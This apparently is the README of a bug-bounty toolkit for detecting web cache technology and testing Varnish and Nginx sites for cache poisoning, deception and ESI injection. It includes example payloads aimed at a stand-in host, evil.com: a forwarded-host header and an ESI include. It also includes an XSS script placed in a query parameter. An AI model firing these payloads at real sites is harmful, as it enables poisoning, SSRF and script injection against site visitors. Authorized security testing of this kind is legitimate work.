# cache-vulnerability-toolkit

A comprehensive toolkit for identifying and testing web cache vulnerabilities, with a focus on custom cache implementations (Varnish, Nginx) versus CDN caches (Cloudflare, Fastly).
## Disclaimer

This tool is for educational purposes and authorized security testing only.

- The author (G33L0) is NOT responsible for any misuse or damage caused by this tool.
- Always ensure you have explicit written permission before testing any systems.
- Unauthorized testing is illegal and unethical.
- Use this tool responsibly and only on systems you own or have permission to test.
- This tool is intended for bug bounty hunters and security professionals.

By using this tool, you agree to use it legally and ethically. Any misuse is solely the responsibility of the user.
## Features

- **Cache Fingerprinter** - Instantly identify cache technology (X-Cache vs CDN)
- **Quick Bash Detector** - Lightning-fast cache type identification
- Automatically categorizes targets by vulnerability potential
- **Cache Scanner** - General cache poisoning and deception testing
- **X-Cache Hunter** - Specialized scanner for Varnish/Nginx/custom caches
- Automated vulnerability detection with severity ratings
- Cache poisoning detection (unkeyed headers, parameters)
- Cache deception testing (static extension bypass)
- Varnish-specific attacks (VCL injection, ESI injection)
- Nginx-specific attacks (method override, cache bypass)
- WordPress cache plugin vulnerability testing
- Detailed reporting with remediation suggestions
## Requirements

- Python 3.6+
- Linux/macOS (Windows with WSL)
- Basic tools: `curl`, `bash`
## Installation

```bash
# Clone the repository
git clone https://github.com/G33L0/cache-vulnerability-toolkit.git
cd cache-vulnerability-toolkit

# Install Python dependencies
pip3 install -r requirements.txt

# Make scripts executable
chmod +x *.sh *.py
```

The Python dependencies can also be installed directly:

```bash
# Install via pip
pip3 install requests colorama urllib3

# Or use requirements.txt
pip3 install -r requirements.txt
```

## Usage

### cache_fingerprint.py

```bash
# Single URL
python3 cache_fingerprint.py -u https://target.com

# Batch scan
python3 cache_fingerprint.py -f targets.txt -o results.json

# Verbose mode
python3 cache_fingerprint.py -u https://target.com -v
```

### quick-cache-detect.sh

```bash
# Single URL
./quick-cache-detect.sh https://target.com

# Batch scan
./quick-cache-detect.sh -f targets.txt
```

### Manual check with curl

```bash
# Quick check
curl -sI https://target.com | grep -iE "x-varnish|x-nginx|cf-ray"

# Decision maker
curl -sI https://target.com | grep -qiE "x-varnish|x-nginx" && echo "✅ TEST IT!" || echo "❌ Skip"
```

### xcache_hunter.py

```bash
# Specialized X-Cache scanner
python3 xcache_hunter.py -u https://target.com

# With authentication
python3 xcache_hunter.py -u https://target.com -c "session=YOUR_TOKEN"

# Varnish-only tests
python3 xcache_hunter.py -u https://target.com --varnish-only

# Save report
python3 xcache_hunter.py -u https://target.com -o report.json
```

### cache_scanner.py

```bash
# General cache scanner
python3 cache_scanner.py -u https://target.com

# With cookies
python3 cache_scanner.py -u https://target.com -c "session=abc123"

# Verbose mode
python3 cache_scanner.py -u https://target.com -v
```

## Tools

### cache_fingerprint.py

Instant cache technology detection.
Identifies whether a site uses:
- ✅ High Priority: Varnish, Nginx, Custom X-Cache (30-40% vuln rate)
- ❌ Low Priority: Cloudflare, Fastly, Akamai (5-10% vuln rate)
Output:
- Cache technology
- Confidence level
- Vulnerability potential
- Specific recommendations
Use Case: Triage hundreds of targets to find high-value X-Cache sites
### xcache_hunter.py

Specialized X-Cache vulnerability scanner. Focuses on custom cache implementations:
- Varnish (VCL injection, ESI injection)
- Nginx (method override, cache bypass)
- Custom reverse proxies
- WordPress cache plugins
Features:
- Automated fingerprinting
- Technology-specific tests
- Detailed vulnerability reporting
- JSON export for integration
Use Case: Deep testing of confirmed X-Cache targets
### cache_scanner.py

General cache vulnerability scanner. Tests for:
- Cache poisoning (12+ headers)
- Cache deception attacks
- Unkeyed parameters
- Cookie-based vulnerabilities
Features:
- Comprehensive header testing
- Path manipulation detection
- Multi-vector testing
- Clear severity ratings
Use Case: Thorough testing of any cached site
### quick-cache-detect.sh

Lightning-fast bash detector. Advantages:
- No dependencies (pure bash + curl)
- Color-coded output
- Instant results (<1 second)
- Batch scanning support
Use Case: Quick triage in the field or on mobile terminals
## Target Prioritization

| Cache Type | Vulnerability Rate | Recommendation |
|---|---|---|
| Varnish | ~30-40% | ✅ HIGH PRIORITY |
| Nginx Caching | ~30-40% | ✅ HIGH PRIORITY |
| Custom X-Cache | ~30-40% | ✅ HIGH PRIORITY |
| WordPress Plugins | ~40-50% | ✅ HIGH PRIORITY |
| Cloudflare | ~5-10% | ❌ Skip/Low Priority |
| Fastly | ~10-15% | |
| Akamai | ~5% | ❌ Skip |
## Identifying the cache from response headers

✅ High Priority Headers:

```text
X-Varnish: 123456 789012   → Varnish (BEST TARGET!)
X-Nginx-Cache: HIT         → Nginx caching
X-Cache: HIT               → Custom (no CDN)
X-WP-Total-Cache           → WordPress plugin
```

❌ Low Priority Headers:

```text
CF-Ray: abc123             → Cloudflare (skip)
X-Fastly-Request-ID        → Fastly (skip or ESI only)
X-Amz-Cf-Id                → CloudFront (skip)
```
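The header-to-technology mapping above, implemented as a small offline classifier. This is an added example, not code from the toolkit: the signature table and the `high_priority` / `low_priority` bucket names follow this README, the Akamai check via a `Server: AkamaiGHost` value is an assumption, and the sample headers are constructed.

```python
import re
from dataclasses import dataclass

# (header-name regex, technology, triage priority), checked in order.
# CDN signatures come first: an origin behind Cloudflare may still emit its
# own X-Cache header, and the README ranks the CDN in front as the decider.
SIGNATURES = [
    (r"^cf-ray$",              "Cloudflare",       "low"),
    (r"^x-fastly-request-id$", "Fastly",           "low"),
    (r"^x-amz-cf-id$",         "CloudFront",       "low"),
    (r"^x-varnish$",           "Varnish",          "high"),
    (r"^x-nginx-cache$",       "Nginx",            "high"),
    (r"^x-wp-.*cache",         "WordPress plugin", "high"),
    (r"^x-cache$",             "Custom X-Cache",   "high"),
]

@dataclass
class Fingerprint:
    technology: str
    priority: str   # "high", "low" or "unknown"
    evidence: str   # the header line that produced the verdict

def fingerprint(headers):
    """Classify one response from its headers (names matched case-insensitively)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for pattern, tech, prio in SIGNATURES:
        for name, value in lowered.items():
            if re.match(pattern, name):
                return Fingerprint(tech, prio, f"{name}: {value}")
    # Assumption: Akamai is recognised by its "AkamaiGHost" Server value.
    if "akamaighost" in lowered.get("server", "").lower():
        return Fingerprint("Akamai", "low", f"server: {lowered['server']}")
    return Fingerprint("unknown", "unknown", "")

def triage(results):
    """Group {url: headers} into the buckets the README's results.json uses."""
    buckets = {"high_priority": [], "low_priority": [], "unknown": []}
    for url, headers in results.items():
        fp = fingerprint(headers)
        key = {"high": "high_priority", "low": "low_priority"}.get(fp.priority, "unknown")
        buckets[key].append({"url": url, "technology": fp.technology, "evidence": fp.evidence})
    return buckets

if __name__ == "__main__":
    # Constructed sample responses, not captured from any real host.
    sample = {"https://a.example": {"X-Varnish": "123456 789012", "Age": "12"},
              "https://b.example": {"CF-Ray": "abc123", "X-Cache": "HIT"},
              "https://c.example": {"Content-Type": "text/html"}}
    for bucket, entries in triage(sample).items():
        print(bucket, entries)
```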
## Workflows

### Full reconnaissance pipeline

```bash
# 1. Collect subdomains
subfinder -d target.com -o subs.txt

# 2. Check alive hosts
cat subs.txt | httpx -silent -o alive.txt

# 3. Fingerprint cache types
python3 cache_fingerprint.py -f alive.txt -o results.json

# 4. Extract high priority targets (-r strips the JSON quotes so the URLs are usable as-is)
cat results.json | jq -r '.high_priority[].url' > high-priority.txt

# 5. Test high priority targets
cat high-priority.txt | while read -r url; do
    python3 xcache_hunter.py -u "$url" -v
    sleep 5
done
```

### Single target

```bash
# Quick check if worth testing
./quick-cache-detect.sh https://target.com

# If HIGH PRIORITY, run full scan
python3 xcache_hunter.py -u https://target.com -o report.json
```

### Batch triage

```bash
# Scan multiple targets
python3 cache_fingerprint.py -f targets.txt

# Results automatically categorized:
# - High Priority (X-Cache targets)
# - Medium Priority (worth investigating)
# - Low Priority (CDNs to skip)
```

## Vulnerability Types

### Cache Poisoning

Description: Injecting malicious content into cached responses
Detection:

- Tests 12+ common unkeyed headers
- Identifies reflected values
- Confirms cache persistence

Example:

```bash
curl -H "X-Forwarded-Host: evil.com" https://target.com/app.js
# If evil.com appears in cached response → VULNERABLE
```

### Cache Deception

Description: Tricking cache into storing sensitive data publicly

Detection:

- Tests static extensions on dynamic paths
- Path delimiter confusion
- Authenticated content caching

Example:

```bash
curl -b "session=TOKEN" https://target.com/profile.css
# If sensitive data cached publicly → VULNERABLE
```

### ESI Injection

Description: Edge Side Includes injection for XSS/SSRF

Detection:

- Checks for ESI capability
- Tests ESI tag processing
- Validates injection vectors

Example:

```bash
curl "https://target.com?x=<esi:include src='http://evil.com'/>"
# If ESI processed → VULNERABLE
```

### Unkeyed Parameters

Description: Query parameters not included in cache key

Detection:

- Tests common parameters
- Validates reflection and caching
- Confirms persistence

Example:

```bash
curl "https://target.com?utm_source=<script>alert(1)</script>"
# If cached and served to other users → VULNERABLE
```

## Command Reference

### cache_fingerprint.py

```bash
python3 cache_fingerprint.py -u <URL>               # Single URL
python3 cache_fingerprint.py -f <FILE>              # Batch scan
python3 cache_fingerprint.py -u <URL> -v            # Verbose
python3 cache_fingerprint.py -f <FILE> -o <JSON>    # Save report
```

### xcache_hunter.py

```bash
python3 xcache_hunter.py -u <URL>                   # Full scan
python3 xcache_hunter.py -u <URL> -c "cookie"       # With auth
python3 xcache_hunter.py -u <URL> --varnish-only    # Varnish tests only
python3 xcache_hunter.py -u <URL> --nginx-only      # Nginx tests only
python3 xcache_hunter.py -u <URL> -v                # Verbose
python3 xcache_hunter.py -u <URL> -o report.json    # Save report
```

### cache_scanner.py

```bash
python3 cache_scanner.py -u <URL>                   # Basic scan
python3 cache_scanner.py -u <URL> -c "cookie"       # With auth
python3 cache_scanner.py -u <URL> -v                # Verbose
```

### quick-cache-detect.sh

```bash
./quick-cache-detect.sh <URL>                       # Single URL
./quick-cache-detect.sh -f <FILE>                   # Batch scan
```

## Documentation

- `cache_vulnerability_hunting_guide.md` - Comprehensive testing guide
- `xcache_target_guide.md` - X-Cache specific strategies
- `cache_detection_cheatsheet.md` - Quick reference
- `cache_cheatsheet.md` - One-liner commands
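The defensive counterpart to the cache poisoning, cache deception and unkeyed-parameter checks in the Vulnerability Types section, as an added example that is not part of the toolkit: a cache policy that keys on the full query string, drops `X-Forwarded-Host` (the header the poisoning example uses) before it reaches the origin, and refuses to store responses that look like a deception hit. The extension check relies on Python's `mimetypes` table, which is an assumption about how the static-extension rule is expressed; all inputs are constructed.

```python
import mimetypes
from urllib.parse import parse_qsl, urlencode, urlsplit

# Request headers that must never influence a cached response. The README's
# poisoning example uses X-Forwarded-Host; the toolkit tests "12+" such headers,
# so a real policy extends this set to whatever the origin reflects.
UNKEYED_RISK_HEADERS = {"x-forwarded-host"}

def cache_key(url):
    """Key on host, path and the full, sorted query string.

    Keying every parameter (utm_source included) means a response poisoned via
    ?utm_source=<script> is only ever served back to that exact URL, never to a
    visitor of the clean one."""
    parts = urlsplit(url)
    query = urlencode(sorted(parse_qsl(parts.query, keep_blank_values=True)))
    return f"{parts.netloc.lower()}{parts.path or '/'}?{query}"

def strip_unkeyed(request_headers):
    """Drop unkeyed headers before forwarding, so nothing the cache ignores
    can change what the origin renders into a shared entry."""
    return {k: v for k, v in request_headers.items()
            if k.lower() not in UNKEYED_RISK_HEADERS}

def is_cacheable(path, response_headers):
    """Cache deception guard for the origin's response.

    Refuses to store anything that sets a cookie or is marked private/no-store,
    and anything whose Content-Type contradicts the static extension in the
    path, e.g. /profile.css answered with text/html (a profile page, not CSS)."""
    h = {k.lower(): v for k, v in response_headers.items()}
    cc = h.get("cache-control", "").lower()
    if "set-cookie" in h or "private" in cc or "no-store" in cc:
        return False
    expected, _ = mimetypes.guess_type(path)   # assumption: extension map via mimetypes
    actual = h.get("content-type", "").split(";")[0].strip().lower()
    if expected and actual and actual != expected:
        return False
    return True

if __name__ == "__main__":
    # Constructed request/response samples, not captured from a real target.
    print(cache_key("https://Target.com/app.js?v=2&utm_source=x"))
    print(strip_unkeyed({"Host": "target.com", "X-Forwarded-Host": "evil.com"}))
    print(is_cacheable("/profile.css", {"Content-Type": "text/html; charset=utf-8"}))
```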
## Resources

- PortSwigger Web Academy - Cache poisoning labs
- James Kettle's Research - Original research
- OWASP Testing Guide - Security testing methodology
## Contributing

Contributions are welcome! Please feel free to submit a Pull Request.

1. Fork the repository
2. Create a feature branch (`git checkout -b feature/AmazingFeature`)
3. Commit your changes (`git commit -m 'Add some AmazingFeature'`)
4. Push to the branch (`git push origin feature/AmazingFeature`)
5. Open a Pull Request
## Changelog

Initial release:

- Cache fingerprinting tool
- X-Cache specialized scanner
- General cache vulnerability scanner
- Bash quick detector
- Comprehensive documentation
## Author

G33L0

- Telegram: @x0x0h33l0
- GitHub: G33L0

For questions, suggestions, or collaborations, feel free to reach out!
## License

This project is licensed under the MIT License - see the LICENSE file for details.
## Legal Notice

**READ THIS CAREFULLY:**

This toolkit is provided for educational and ethical security testing purposes only. The tools included are designed to help security professionals and bug bounty hunters identify vulnerabilities in systems they have explicit permission to test.

You are responsible for:

- Obtaining proper authorization before testing any system
- Complying with all applicable laws and regulations
- Using the tools ethically and responsibly
- Any consequences resulting from misuse of these tools

The author (G33L0) explicitly disclaims responsibility for:

- Any misuse or abuse of these tools
- Any damage caused by use of these tools
- Any illegal activities conducted with these tools
- Any violations of terms of service or acceptable use policies

By downloading, installing, or using these tools, you agree to:

- Use them only on systems you own or have written permission to test
- Follow all applicable laws and regulations
- Accept full responsibility for your actions
- Not hold the author liable for any damages or consequences
## Acknowledgments

- Thanks to the bug bounty community for continuous research
- PortSwigger for groundbreaking cache poisoning research
- All contributors who help improve this toolkit
## Support

If you find this toolkit useful, please:

- ⭐ Star this repository
- 🔄 Share with fellow bug bounty hunters
- 📢 Spread the word on social media
- 💬 Join the conversation on Telegram

Happy Hunting! 🎯

Remember: Always test ethically and legally. Good luck with your bug bounties!

Made with ❤️ by G33L0